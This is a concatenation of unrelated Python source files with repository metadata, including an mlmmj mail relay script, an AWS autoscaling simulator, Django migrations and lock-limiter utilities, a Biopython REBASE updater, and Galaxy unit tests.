# Usually in mlmmj you invoke /usr/bin/mlmmj-recieve. But the mlmmj is in
# another container. Therefore we invoke this file which sends the mail
# to the host running mlmmj (and so to mlmmj_listener.py).
import sys
import os
import requests
import json
import base64
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Script called by postfix and sends mail to an mlmmj listener (mlmmj_listener.py).')
parser.add_argument('nexthop', help='$nexthop from postfix')
parser.add_argument('--mlmmj', type=str, required=False, help='Host of the mlmmj listener (ip or hostname). Default is to use the MLMMJ_HOST env variable (or "mlmmj" if not set)')
parser.add_argument('--port', '-p', type=int, required=False, help='Port of the mlmmj listener. Default is to use the MLMMJ_PORT env variable (or 7777 if not set)')
parser.add_argument('--spool', '-s', type=str, required=False, default='/var/spool/mlmmj', help='Path of the mlmmj directory (default is "/var/spool/mlmmj")')
args = parser.parse_args()
if args.mlmmj is None:
mlmmj_host = os.environ.get('MLMMJ_HOST', 'mlmmj')
else:
mlmmj_host = args.mlmmj
if args.port is None:
try:
mlmmj_port = int(os.environ.get('MLMMJ_PORT', 7777))
except ValueError as e:
print('MLMMJ_PORT env variable must be an integer, errror:', e)
sys.exit(1)
else:
mlmmj_port = args.port
# after everything is ok we read the mail from stdin and encode it
bytes_mail = sys.stdin.buffer.read()
enc = base64.b64encode(bytes_mail).decode('utf-8')
# now we finally send the data
# we want some kind of timeout so we give the listener 5 minutes...
# should be more than enough
list_path = os.path.join(args.spool, args.nexthop)
args = ['-F', '-L', list_path]
data = {'mlmmj-command': 'mlmmj-receive', 'args': args, 'mail': enc}
try:
response = requests.post('http://%s:%d' % (mlmmj_host, mlmmj_port),
json=data, headers={'host': 'localhost.mlmmj'}, timeout=600)
except requests.exceptions.RequestException as e:
print('Error while connecting to mlmmj listener:', e)
sys.exit(1)
except requests.exceptions.Timeout as timeoutErr:
print('receive post timed out, maybe a bug in the image?')
sys.exit(1)
# everything worked fine... get response
if response.status_code != 200:
print('Got weird return value, probably a bug? The listener should always return 200 status code')
text = response.text
# get json data
try:
json_data = json.loads(text)
except ValueError as e:
print("Got a weird response, I don't know what happend to the mail, probably check /var/spool/mlmmj/%s/archive (can't parse json)" % sys.argv[1])
sys.exit(1)
if 'returncode' not in json_data or 'output' not in json_data or type(json_data['returncode']) != int:
print("Got a weird response, I don't know what happend to the mail, probably check /var/spool/mlmmj/%s/archive (missing/wrong value in data)" % sys.argv[1])
sys.exit(1)
if json_data['returncode'] != 0:
print('mlmmj-receive returned with an error:', json_data['output'])
sys.exit(json_data['returncode'])
print(json_data['output'])
| 50.10989 | 183 | 0.700219 |
795ad74b4743fa9d1590539217b207e5671760f9 | 9,179 | py | Python | simulator/interfaceSimulator.py | shelpuk/AWS_simulator_for_reinforcement_learning | 7d43c22be8a89379b9f882f060502410f9bac9dc | [
"Unlicense",
"MIT"
] | 9 | 2018-06-11T08:07:45.000Z | 2021-03-08T20:10:58.000Z | simulator/interfaceSimulator.py | shelpuk/AWS_simulator_for_reinforcement_learning | 7d43c22be8a89379b9f882f060502410f9bac9dc | [
"Unlicense",
"MIT"
] | null | null | null | simulator/interfaceSimulator.py | shelpuk/AWS_simulator_for_reinforcement_learning | 7d43c22be8a89379b9f882f060502410f9bac9dc | [
"Unlicense",
"MIT"
] | 5 | 2018-07-07T09:18:06.000Z | 2021-06-23T17:46:00.000Z | import json
import csv
import random
import os
import re
import numpy as np
import gc
import copy
class server(object):
def __init__(self,
startTime,
setupTime,
requestCanHandle = 50,
failureProbability = 0.,
type = 0):
self.startTime = startTime
self.setupTime = setupTime
self.requestCanHandle = requestCanHandle
self.status = 'starting'
self.timeToOperational = setupTime
self.failureProbability = failureProbability
self.type = type
self.generateRandomSequence(sequenceSize=1400)
def generateRandomSequence(self, sequenceSize):
self.randomSequence = np.random.uniform(0,1,sequenceSize)
def updateStatus(self, currentTime):
#Checking if a server fails
minuteID = int(currentTime % 1440)
randomValue = self.randomSequence[minuteID % len(self.randomSequence)]
if randomValue <= self.failureProbability:
self.status = 'crashed'
#Update timeToOperational if server is still starting
#and status if it went operational
if self.status == 'starting':
if currentTime - self.startTime < self.setupTime:
self.timeToOperational = self.setupTime - (currentTime - self.startTime)
else:
self.status = 'operational'
self.timeToOperational = 0
class interfaceSimulator(object):
def __init__(self,
files,
timeframe = 10,
serverStartTime = 20,
initialServers=[4, 4],
startTimeShift = 0,
sequenceAutoUpdate = True,
serverTypes = 2,
failureProbabilities = [0., 0.005],
mode = 'M'):
self.files = files
self.timeframe = timeframe
self.serverStartTime = serverStartTime
self.initialServers = initialServers
self.serverStartTime = serverStartTime
self.startTimeShift = startTimeShift
self.sequenceAutoUpdate = sequenceAutoUpdate
self.numPatterns = len(files)
self.serverTypes = serverTypes
self.failureProbabilities = failureProbabilities
self.mode = mode
self.iteration = 0
self.emulationStartingTime = 0
self.currentTime = self.emulationStartingTime + self.startTimeShift * 60
self.__initializeData__(files)
self.__initiateServers__(self.initialServers)
self.__generateRandomSequence__()
def __initializeData__(self, files):
self.fileData = []
for file in files:
self.fileData.append([])
with open (file) as csvfile:
reader = csv.reader(csvfile, delimiter=',')
next(reader)
for row in reader:
self.fileData[-1].append(row)
def __initiateServers__(self, number):
output = []
for type in range(len(number)):
for s in [server(self.currentTime, 0, 0) for i in range(number[type])]:
s.status = 'operational'
s.type = type
s.failureProbability = self.failureProbabilities[type]
output.append(s)
self.servers = output
def __initiateSequences__(self):
self.sequence = []
id = range(self.numPatterns)
for i in id:
sequenceInstance = [random.gauss(float(params[1]), float(params[2])) for params in self.fileData[i]]
self.sequence.append(sequenceInstance)
def __generateRandomServerSequence__(self, sequenceSize):
for server in self.servers:
server.generateRandomSequence(sequenceSize=sequenceSize)
def __generateRandomSequence__(self, id=None):
if id is not None and id >= self.numPatterns: raise Exception('Incorrect id: id of a sequence is higher than the number of sequences (files with data)')
if id is None:
self.sequence = []
id = range(self.numPatterns)
for i in id:
sequenceInstance = [random.gauss(float(params[1]), float(params[2])) for params in self.fileData[i]]
self.sequence.append(sequenceInstance)
else:
sequenceInstance = [random.gauss(float(params[1]), float(params[2])) for params in self.fileData[id]]
self.sequence[id] = sequenceInstance
self.__generateRandomServerSequence__(sequenceSize=1440)
def getSequenceId(self):
# This is a stub allowing you to use several datasets (sequences, simulation modes).
# For example, one mode could be for regular days and another - for black Friday sales spike.
# For the purpose of this excersise we will use only ine simulation mode: regular days.
return 0
def setFailureProbability(self, failureProbabilities):
self.failureProbabilities = failureProbabilities
for server in self.servers:
server.failureProbability = failureProbabilities[server.type]
def setLoad(self, load):
self.load = float(load)
def getNextState(self):
seqNumRequests = []
seqMeanCPU = []
seqOperationaServers = []
seqStartingServers = []
for i in range(self.timeframe):
seqID = int(self.getSequenceId())
minuteID = int(self.currentTime % 1440)
params = self.fileData[seqID][minuteID % len(self.fileData)]
if self.mode == 'M':
seqNumRequests.append(random.gauss(float(self.load), float(params[2])))
else:
seqNumRequests.append(self.sequence[seqID][minuteID])
seqOperationaServers.append(self.getNumOperationalServers())
seqStartingServers.append(self.getNumStartingServers())
prevOperationalServers = sum(seqOperationaServers[-1])
if prevOperationalServers < 1: prevOperationalServers = 0.1
seqMeanCPU.append(seqNumRequests[-1] / (prevOperationalServers * 50.))
self.currentTime += 1
if self.currentTime % 1440 == 0 and self.sequenceAutoUpdate:
self.__generateRandomSequence__(seqID)
self.updateServers()
hour = np.floor((self.currentTime / 60) % 24)
meanRequests = np.mean(seqNumRequests)
maxCPULoad = np.mean(seqMeanCPU)
numOperationalServers = np.mean(seqOperationaServers, axis=0)
numStartingServers = np.mean(seqStartingServers, axis=0)
return {'meanRequests':meanRequests,
'numOperationalServers':numOperationalServers,
'numStartingServers':numStartingServers,
'failureProbabilities':self.failureProbabilities,
'maxCPULoad':maxCPULoad,
'servers':copy.deepcopy(self.servers),
'currentTime':self.currentTime}
def setState(self, state):
self.currentTime = state['currentTime']
self.servers = copy.deepcopy(state['servers'])
def updateServers(self):
for s in self.servers:
s.updateStatus(self.currentTime)
self.servers = [server for server in self.servers if server.status != 'crashed']
def getNumOperationalServers(self):
return [sum([1*(s.status == 'operational' and s.type == type) for s in self.servers]) for type in range(self.serverTypes)]
def getNumStartingServers(self):
return [sum([1*(s.status == 'starting' and s.type == type) for s in self.servers]) for type in range(self.serverTypes)]
def getStartingServers(self):
return [i for i in self.servers if i.status == 'starting']
def reset(self):
self.currentTime = self.emulationStartingTime
self.currentTime = self.emulationStartingTime + self.startTimeShift * 60
self.__initiateServers__(self.initialServers)
self.__generateRandomSequence__()
def __startServer__(self, number, type, failureProbability):
for i in range(number):
self.servers.append(server(self.currentTime, self.serverStartTime, failureProbability=failureProbability, type=type))
def __stopServer__(self, number, type):
if number >= sum(self.getNumOperationalServers()): return 0
if number > self.getNumOperationalServers()[type]: return 0
else:
self.servers = [otherInstances for otherInstances in self.servers if otherInstances.type != type] +\
sorted([requestedInstance for requestedInstance in self.servers if requestedInstance.type == type], key=lambda x: (self.currentTime - x.setupTime))[number:]
def startEC2(self, number=1, type=0):
self.__startServer__(number=number, type=type, failureProbability=self.failureProbabilities[type])
def startSpot(self, number=1, type=1):
self.__startServer__(number=number, type=type, failureProbability=self.failureProbabilities[type])
def stopEC2(self, number=1, type = 0):
self.__stopServer__(number=number, type=type)
def stopSpot(self, number=1, type = 1):
self.__stopServer__(number=number, type=type)
| 40.436123 | 183 | 0.636562 |
795ad758b47f5c7369bfbaec00fac6651a04abfb | 426 | py | Python | tenants/migrations/0002_auto_20190521_0816.py | epineda/chatter | de968687dfe88ace589cece7ba5259078a428120 | [
"MIT"
] | 86 | 2018-11-15T14:43:57.000Z | 2022-03-28T05:57:08.000Z | tenants/migrations/0002_auto_20190521_0816.py | alexsilva/chatter | 28869bcc6366846d8d58d9fbea0fb67fec58c8de | [
"MIT"
] | 34 | 2019-02-11T07:01:07.000Z | 2021-06-04T21:47:57.000Z | tenants/migrations/0002_auto_20190521_0816.py | alexsilva/chatter | 28869bcc6366846d8d58d9fbea0fb67fec58c8de | [
"MIT"
] | 39 | 2018-11-02T13:04:38.000Z | 2021-12-15T03:04:00.000Z | # Generated by Django 2.0.9 on 2019-05-21 08:16
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('tenants', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='client',
name='on_trial',
),
migrations.RemoveField(
model_name='client',
name='paid_until',
),
]
| 19.363636 | 47 | 0.553991 |
795ad7a6c076c720f4d39aac621b9781a6baca7f | 347 | py | Python | tests/smoke_tests/smoke_test.py | jnguyen1098/quizmake | 760f59b06b3c574ac176305deeaa13d077080e64 | [
"0BSD"
] | 1 | 2021-06-21T21:51:44.000Z | 2021-06-21T21:51:44.000Z | tests/smoke_tests/smoke_test.py | jnguyen1098/quizmake | 760f59b06b3c574ac176305deeaa13d077080e64 | [
"0BSD"
] | 8 | 2020-06-19T13:30:57.000Z | 2021-04-15T20:07:33.000Z | tests/smoke_tests/smoke_test.py | jnguyen1098/quizmake | 760f59b06b3c574ac176305deeaa13d077080e64 | [
"0BSD"
] | null | null | null | # !/usr/bin/env python3
"""
Execute smoke test cases.
Testing to see if the system works
"""
from quizmake import core
def test_sanity() -> None:
"""Test for sanity."""
args = [
"prog",
"tests/test_data/tokens/valid_tokens/",
"tests/test_data/questions/valid_questions/",
]
assert core.main(args) == 0
| 17.35 | 53 | 0.619597 |
795ad8e07adb09480349389672006ff53988dce7 | 632 | py | Python | tests/compatibility.py | ecoinvent/brightway2-data | 3aa42d93cb6ded0e8a8cb4162c052995ac7060d3 | [
"BSD-3-Clause"
] | null | null | null | tests/compatibility.py | ecoinvent/brightway2-data | 3aa42d93cb6ded0e8a8cb4162c052995ac7060d3 | [
"BSD-3-Clause"
] | null | null | null | tests/compatibility.py | ecoinvent/brightway2-data | 3aa42d93cb6ded0e8a8cb4162c052995ac7060d3 | [
"BSD-3-Clause"
] | null | null | null | from bw2data.tests import BW2DataTest, bw2test
from bw2data import *
from .fixtures import food, biosphere
@bw2test
def test_repr_str_unicode():
objects = (
geomapping,
databases,
methods,
normalizations,
weightings,
Database("foo"),
DataStore("foo"),
projects,
)
for obj in objects:
assert repr(obj)
assert str(obj)
print(obj)
@bw2test
def test_registered_database_repr():
d = Database("biosphere")
d.write(biosphere)
assert repr(d)
assert str(d)
# Make sure can be printed - not for debugging
print(d)
| 19.75 | 50 | 0.615506 |
795ad94b286a2911d72bc46f9e37e09783767df8 | 1,523 | py | Python | textgrid_to_boris/boris_tools.py | Nagasaki45/textgrid-to-boris | e924a2a6196baf6967ccbc6ef1124d98bb9bcff8 | [
"MIT"
] | null | null | null | textgrid_to_boris/boris_tools.py | Nagasaki45/textgrid-to-boris | e924a2a6196baf6967ccbc6ef1124d98bb9bcff8 | [
"MIT"
] | null | null | null | textgrid_to_boris/boris_tools.py | Nagasaki45/textgrid-to-boris | e924a2a6196baf6967ccbc6ef1124d98bb9bcff8 | [
"MIT"
] | null | null | null | import collections
from datetime import datetime
import json
import operator
Event = collections.namedtuple(
'Event',
['time', 'subject', 'code', 'type', 'modifier', 'comment'],
defaults=['', '', ''],
)
def read_boris(filepath):
# TODO input validation
with open(filepath) as f:
return json.load(f)
def write_boris(boris, filepath):
with open(filepath, 'w') as f:
json.dump(boris, f)
def get_behavior_by_code(boris, code):
for behavior in boris['behaviors_conf'].values():
if behavior['code'] == code:
return behavior
raise ValueError(f'Behavior doesn\'t exist: "{code}"')
def get_subject_by_name(boris, name):
for subject in boris['subjects_conf'].values():
if subject['name'] == name:
return subject
raise ValueError(f'Subject doesn\'t exist: "{name}"')
def create_event(start_time, behavior_code, subject_name):
return Event(start_time, subject_name, behavior_code)
def create_observation(events, timestamp):
date = datetime.fromtimestamp(timestamp)
return {
'events': sorted(events, key=operator.attrgetter('time')),
'type': 'LIVE', # Otherwise we need to take care of media.
# The user can do it later.
'date': date.isoformat(),
'description': '',
'time offset': 0,
'file': {i: [] for i in range(1, 9)},
}
def add_observation(boris, name, observation):
boris['observations'][name] = observation
return boris
| 25.813559 | 67 | 0.632305 |
795ad9d93d1688c2dc1bf770a7e4d93b2b2414dd | 4,343 | py | Python | Scripts/Restriction/rebase_update.py | rwst/biopython | d8280b25e3fefdf7aebb7700a7080879a4146200 | [
"BSD-3-Clause"
] | 2 | 2019-11-21T02:34:52.000Z | 2021-02-14T07:47:43.000Z | Scripts/Restriction/rebase_update.py | rwst/biopython | d8280b25e3fefdf7aebb7700a7080879a4146200 | [
"BSD-3-Clause"
] | null | null | null | Scripts/Restriction/rebase_update.py | rwst/biopython | d8280b25e3fefdf7aebb7700a7080879a4146200 | [
"BSD-3-Clause"
] | 1 | 2019-04-12T20:52:12.000Z | 2019-04-12T20:52:12.000Z | #!/usr/bin/env python
#
# Restriction Analysis Libraries.
# Copyright (C) 2004. Frederic Sohm.
#
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
#
"""Update the Rebase EMBOSS files.
The Rebase EMBOSS files are used by `ranacompiler.py` to build the updated
`Restriction_Dictionary.py` module for `Bio.Restriction`.
"""
from __future__ import print_function
import os
import sys
import time
import optparse
try:
from urllib import FancyURLopener, urlcleanup
except ImportError:
# Python 3
from urllib.request import FancyURLopener, urlcleanup
from Bio.Restriction.RanaConfig import ftp_proxy, ftp_Rebase, Rebase_name
from Bio.Restriction.RanaConfig import ftp_emb_e, ftp_emb_s, ftp_emb_r
class RebaseUpdate(FancyURLopener):
def __init__(self, ftpproxy=''):
"""RebaseUpdate([ftpproxy]]) -> new RebaseUpdate instance.
if ftpproxy is not given RebaseUpdate uses the corresponding
variable from RanaConfig.
ftpproxy is the proxy to use if any.
"""
proxy = {'ftp': ftpproxy or ftp_proxy}
if not Rebase_name:
raise FtpNameError('Rebase')
if not proxy['ftp']:
proxy = {}
FancyURLopener.__init__(self, proxy)
def openRebase(self, name=ftp_Rebase):
print('\n Please wait, trying to connect to Rebase\n')
try:
self.open(name)
except Exception:
raise ConnectionError('Rebase')
return
def getfiles(self, *files):
for file in self.update(*files):
print('copying %s' % file)
fn = os.path.basename(file)
# filename = os.path.join(Rebase, fn)
filename = os.path.join(os.getcwd(), fn)
print('to %s' % filename)
try:
self.retrieve(file, filename)
# The following line is a workaround for an urllib bug in
# Python 2.7.11 - 2.7.xx (?). It does not seem to work on
# Python 3.xx. Try to remove the line in new Python versions.
urlcleanup()
except IOError as e:
print(e)
print('This error is probably due to a non-solved ftp bug in '
'recent Python versions. Please download the emboss '
'files manually from http://rebase.neb.com/rebase/'
'rebase.f37.html and then run ranacompiler.py. Find '
'more details in the Restriction manual.')
self.close()
return
self.close()
return
def localtime(self):
t = time.gmtime()
year = str(t.tm_year)[-1]
month = str(t.tm_mon)
if len(month) == 1:
month = '0' + month
return year + month
def update(self, *files):
if not files:
files = [ftp_emb_e, ftp_emb_s, ftp_emb_r]
return [x.replace('###', self.localtime()) for x in files]
def __del__(self):
if hasattr(self, 'tmpcache'):
self.close()
#
# self.tmpcache is created by URLopener.__init__ method.
#
return
class FtpNameError(ValueError):
def __init__(self, which_server):
print(" In order to connect to %s ftp server, you must provide a name.\
\n Please edit Bio.Restriction.RanaConfig\n" % which_server)
sys.exit()
class ConnectionError(IOError):
def __init__(self, which_server):
print('\
\n Unable to connect to the %s ftp server, make sure your computer\
\n is connected to the internet and that you have correctly configured\
\n the ftp proxy.\
\n Use the --proxy switch to enter the address of your proxy\
\n' % which_server)
sys.exit()
if __name__ == '__main__':
parser = optparse.OptionParser()
add = parser.add_option
add('-p', '--proxy',
action="store",
dest='ftp_proxy',
default='',
help="set the proxy to be used by the ftp connection.")
(option, args) = parser.parse_args()
Getfiles = RebaseUpdate(option.ftp_proxy)
Getfiles.openRebase()
Getfiles.getfiles()
Getfiles.close()
sys.exit()
| 30.159722 | 79 | 0.602809 |
795ada6783c96cf515117e4563abfebc7a56a01c | 2,023 | py | Python | my_django_tweaks/test_utils/lock_limiter.py | ricard33/my_django_tweaks | 6f96a778515c194d8790dc02aa186a8c7b7b2e47 | [
"MIT"
] | 2 | 2019-06-11T09:57:16.000Z | 2019-06-11T10:02:13.000Z | my_django_tweaks/test_utils/lock_limiter.py | ricard33/my_django_tweaks | 6f96a778515c194d8790dc02aa186a8c7b7b2e47 | [
"MIT"
] | null | null | null | my_django_tweaks/test_utils/lock_limiter.py | ricard33/my_django_tweaks | 6f96a778515c194d8790dc02aa186a8c7b7b2e47 | [
"MIT"
] | null | null | null | from contextlib import contextmanager
from django.conf import settings
from django.db.models.sql.compiler import SQLCompiler
class WouldSelectMultipleTablesForUpdate(Exception):
pass
def replacement_as_sql(self, *args, **kwargs):
sql = self.query_lock_limiter_old_as_sql(*args, **kwargs)
# We're doing this after as_sql because at this point all the
# processing to gather information about used tables is guaranteed to be done.
table_names = list(self.query.table_map.keys())
if self.query.select_for_update and (len(table_names) > 1):
whitelisted = sorted(table_names) in self.query_lock_limiter_whitelist
if not whitelisted:
raise WouldSelectMultipleTablesForUpdate(
f"Query would select_for_update more than one table: {sql}. "
f"Add {table_names} to settings.TEST_SELECT_FOR_UPDATE_WHITELISTED_TABLE_SETS "
f"to allow it."
)
return sql
def patch_sqlcompiler(whitelisted_table_sets):
SQLCompiler.query_lock_limiter_old_as_sql = SQLCompiler.as_sql
SQLCompiler.as_sql = replacement_as_sql
SQLCompiler.query_lock_limiter_whitelist = [
sorted(tables) for tables in whitelisted_table_sets
]
def unpatch_sqlcompiler():
SQLCompiler.as_sql = SQLCompiler.query_lock_limiter_old_as_sql
delattr(SQLCompiler, "query_lock_limiter_old_as_sql")
@contextmanager
def query_lock_limiter(enable=False, whitelisted_table_sets=[]):
enabled = enable or getattr(
settings, "TEST_SELECT_FOR_UPDATE_LIMITER_ENABLED", False
)
if not enabled:
yield
return
was_already_patched = hasattr(SQLCompiler, "query_lock_limiter_old_as_sql")
if not was_already_patched:
whitelist = whitelisted_table_sets or getattr(
settings, "TEST_SELECT_FOR_UPDATE_WHITELISTED_TABLE_SETS", []
)
patch_sqlcompiler(whitelist)
try:
yield
finally:
if not was_already_patched:
unpatch_sqlcompiler()
| 34.288136 | 95 | 0.723678 |
795adad02d040438e8a8f5e3ad983a59632c6d1e | 163 | py | Python | utis/__init__.py | momoladebrouill/utis | d3abecc7a0a1467d5dc3a2be566cef26efc1fa70 | [
"MIT"
] | null | null | null | utis/__init__.py | momoladebrouill/utis | d3abecc7a0a1467d5dc3a2be566cef26efc1fa70 | [
"MIT"
] | null | null | null | utis/__init__.py | momoladebrouill/utis | d3abecc7a0a1467d5dc3a2be566cef26efc1fa70 | [
"MIT"
] | null | null | null | from .plan import Table,Plan
from .html import Balise
from .Fractions import Frac
from .complex import Complex
from .AntsFight import Ant
from .vec import Pos,Vec
| 23.285714 | 28 | 0.803681 |
795add4e55a3cad41c707acef472fe9668a59092 | 12,444 | py | Python | test/unit/managers/test_HistoryContentsManager.py | bornea/galaxy-apostl-docker | e75d27103d9c48e4925708fd06b585cb5471382e | [
"CC-BY-3.0"
] | null | null | null | test/unit/managers/test_HistoryContentsManager.py | bornea/galaxy-apostl-docker | e75d27103d9c48e4925708fd06b585cb5471382e | [
"CC-BY-3.0"
] | null | null | null | test/unit/managers/test_HistoryContentsManager.py | bornea/galaxy-apostl-docker | e75d27103d9c48e4925708fd06b585cb5471382e | [
"CC-BY-3.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
"""
import os
import imp
import unittest
import random
test_utils = imp.load_source( 'test_utils',
os.path.join( os.path.dirname( __file__), '../unittest_utils/utility.py' ) )
from sqlalchemy import true
from sqlalchemy import false
from sqlalchemy import desc
from sqlalchemy.sql import text
from base import BaseTestCase
from base import CreatesCollectionsMixin
from galaxy.managers.histories import HistoryManager
from galaxy.managers import hdas
from galaxy.managers import collections
from galaxy.managers import history_contents
default_password = '123456'
user2_data = dict( email='user2@user2.user2', username='user2', password=default_password )
user3_data = dict( email='user3@user3.user3', username='user3', password=default_password )
user4_data = dict( email='user4@user4.user4', username='user4', password=default_password )
# =============================================================================
class HistoryAsContainerTestCase( BaseTestCase, CreatesCollectionsMixin ):
def set_up_managers( self ):
super( HistoryAsContainerTestCase, self ).set_up_managers()
self.history_manager = HistoryManager( self.app )
self.hda_manager = hdas.HDAManager( self.app )
self.collection_manager = collections.DatasetCollectionManager( self.app )
self.contents_manager = history_contents.HistoryContentsManager( self.app )
def add_hda_to_history( self, history, **kwargs ):
dataset = self.hda_manager.dataset_manager.create()
hda = self.hda_manager.create( history=history, dataset=dataset, **kwargs )
return hda
def add_list_collection_to_history( self, history, hdas, name='test collection', **kwargs ):
hdca = self.collection_manager.create( self.trans, history, name, 'list',
element_identifiers=self.build_element_identifiers( hdas ) )
return hdca
def test_contents( self ):
user2 = self.user_manager.create( **user2_data )
history = self.history_manager.create( name='history', user=user2 )
self.log( "calling contents on an empty history should return an empty list" )
self.assertEqual( [], list( self.contents_manager.contents( history ) ) )
self.log( "calling contents on an history with hdas should return those in order of their hids" )
hdas = [ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 3 ) ]
random.shuffle( hdas )
ordered_hda_contents = list( self.contents_manager.contents( history ) )
self.assertEqual( map( lambda hda: hda.hid, ordered_hda_contents ), [ 1, 2, 3 ] )
self.log( "calling contents on an history with both hdas and collections should return both" )
hdca = self.add_list_collection_to_history( history, hdas )
all_contents = list( self.contents_manager.contents( history ) )
self.assertEqual( all_contents, list( ordered_hda_contents ) + [ hdca ] )
def test_contained( self ):
user2 = self.user_manager.create( **user2_data )
history = self.history_manager.create( name='history', user=user2 )
self.log( "calling contained on an empty history should return an empty list" )
self.assertEqual( [], list( self.contents_manager.contained( history ) ) )
self.log( "calling contained on an history with both hdas and collections should return only hdas" )
hdas = [ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 3 ) ]
self.add_list_collection_to_history( history, hdas )
self.assertEqual( list( self.contents_manager.contained( history ) ), hdas )
def test_subcontainers( self ):
user2 = self.user_manager.create( **user2_data )
history = self.history_manager.create( name='history', user=user2 )
self.log( "calling subcontainers on an empty history should return an empty list" )
self.assertEqual( [], list( self.contents_manager.subcontainers( history ) ) )
self.log( "calling subcontainers on an history with both hdas and collections should return only collections" )
hdas = [ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 3 ) ]
hdca = self.add_list_collection_to_history( history, hdas )
subcontainers = list( self.contents_manager.subcontainers( history ) )
self.assertEqual( subcontainers, [ hdca ] )
def test_limit_and_offset( self ):
user2 = self.user_manager.create( **user2_data )
history = self.history_manager.create( name='history', user=user2 )
contents = []
contents.extend([ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 3 ) ])
contents.append( self.add_list_collection_to_history( history, contents[:3] ) )
contents.extend([ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 4, 6 ) ])
contents.append( self.add_list_collection_to_history( history, contents[4:6] ) )
# _subquery = self.contents_manager._contents_common_query( self.contents_manager.subcontainer_class, history.id )
# _subquery = self.contents_manager._contents_common_query( self.contents_manager.contained_class, history.id )
# print _subquery
# for row in _subquery.all():
# print row
self.log( "should be able to limit and offset" )
results = self.contents_manager.contents( history )
# print [ r.id for r in results ]
# print '--'
# print [ c.id for c in contents ]
self.assertEqual( results, contents )
self.assertEqual( self.contents_manager.contents( history, limit=4 ), contents[0:4] )
self.assertEqual( self.contents_manager.contents( history, offset=3 ), contents[3:] )
self.assertEqual( self.contents_manager.contents( history, limit=4, offset=4 ), contents[4:8] )
self.assertEqual( self.contents_manager.contents( history, limit=0 ), [] )
self.assertEqual( self.contents_manager.contents( history, offset=len( contents ) ), [] )
def test_orm_filtering( self ):
user2 = self.user_manager.create( **user2_data )
history = self.history_manager.create( name='history', user=user2 )
contents = []
contents.extend([ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 3 ) ])
contents.append( self.add_list_collection_to_history( history, contents[:3] ) )
contents.extend([ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 4, 6 ) ])
contents.append( self.add_list_collection_to_history( history, contents[4:6] ) )
self.log( "should allow filter on deleted" )
self.hda_manager.delete( contents[1] )
self.hda_manager.delete( contents[4] )
contents[6].deleted = True
deleted = [ contents[1], contents[4], contents[6] ]
self.app.model.context.flush()
# TODO: cross db compat?
filters = [ text( 'deleted = 1' ) ]
# for content in self.contents_manager.contents( history, filters=filters ):
# print content.hid, content.history_content_type, content.id, content.name
self.assertEqual( self.contents_manager.contents( history, filters=filters ), deleted )
# even stranger that sqlalx can use the first model in the union (HDA) for columns across the union
HDA = self.hda_manager.model_class
self.assertEqual( self.contents_manager.contents( history,
filters=[ HDA.deleted == true() ] ), deleted )
filter_limited_contents = self.contents_manager.contents( history,
filters=[ HDA.deleted == true() ], limit=2, offset=1 )
self.assertEqual( filter_limited_contents, deleted[1:] )
self.log( "should allow filter on visible" )
contents[2].visible = False
contents[5].visible = False
contents[6].visible = False
invisible = [ contents[2], contents[5], contents[6] ]
# for content in invisible:
# print content.id, content.__class__.__name__, content
self.app.model.context.flush()
filters = [ text( 'visible = 0' ) ]
self.assertEqual( self.contents_manager.contents( history, filters=filters ), invisible )
self.assertEqual( self.contents_manager.contents( history,
filters=[ HDA.visible == false() ] ), invisible )
filter_limited_contents = self.contents_manager.contents( history,
filters=[ HDA.visible == false() ], limit=2, offset=1 )
self.assertEqual( filter_limited_contents, invisible[1:] )
self.log( "should allow filtering more than one attribute" )
deleted_and_invisible = [ contents[6] ]
filters = [ text( 'deleted = 1' ), text( 'visible = 0' ) ]
self.assertEqual( self.contents_manager.contents( history, filters=filters ), deleted_and_invisible )
self.assertEqual( self.contents_manager.contents( history,
filters=[ HDA.deleted == true(), HDA.visible == false() ] ), deleted_and_invisible )
offset_too_far = self.contents_manager.contents( history,
filters=[ HDA.deleted == true(), HDA.visible == false() ], limit=2, offset=1 )
self.assertEqual( offset_too_far, [] )
self.log( "should allow filtering more than one attribute" )
deleted_and_invisible = [ contents[6] ]
# note the two syntaxes both work
self.assertEqual( self.contents_manager.contents( history,
filters=[ text( 'deleted = 1' ), text( 'visible = 0' ) ] ), deleted_and_invisible )
self.assertEqual( self.contents_manager.contents( history,
filters=[ HDA.deleted == true(), HDA.visible == false() ] ), deleted_and_invisible )
offset_too_far = self.contents_manager.contents( history,
filters=[ HDA.deleted == true(), HDA.visible == false() ], limit=2, offset=1 )
self.assertEqual( offset_too_far, [] )
self.log( "should allow filtering using like" )
# find 'hda-4'
self.assertEqual( [ contents[4] ],
self.contents_manager.contents( history, filters=[ HDA.name.like( '%-4' ) ] ) )
# the collections added above have the default name 'test collection'
self.assertEqual( self.contents_manager.subcontainers( history ),
self.contents_manager.contents( history, filters=[ HDA.name.like( '%collect%' ) ] ) )
def test_order_by( self ):
user2 = self.user_manager.create( **user2_data )
history = self.history_manager.create( name='history', user=user2 )
contents = []
contents.extend([ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 3 ) ])
contents.append( self.add_list_collection_to_history( history, contents[:3] ) )
contents.extend([ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 4, 6 ) ])
contents.append( self.add_list_collection_to_history( history, contents[4:6] ) )
self.log( "should default to hid order_by" )
self.assertEqual( self.contents_manager.contents( history ), contents )
self.log( "should allow asc, desc order_by" )
self.assertEqual( self.contents_manager.contents( history, order_by=desc( 'hid' ) ), contents[::-1] )
def get_create_time( item ):
create_time = getattr( item, 'create_time', None )
if not create_time:
create_time = item.collection.create_time
return create_time
self.log( "should allow create_time order_by" )
newest_first = sorted( contents, key=get_create_time, reverse=True )
results = self.contents_manager.contents( history, order_by=desc( 'create_time' ) )
self.assertEqual( newest_first, results )
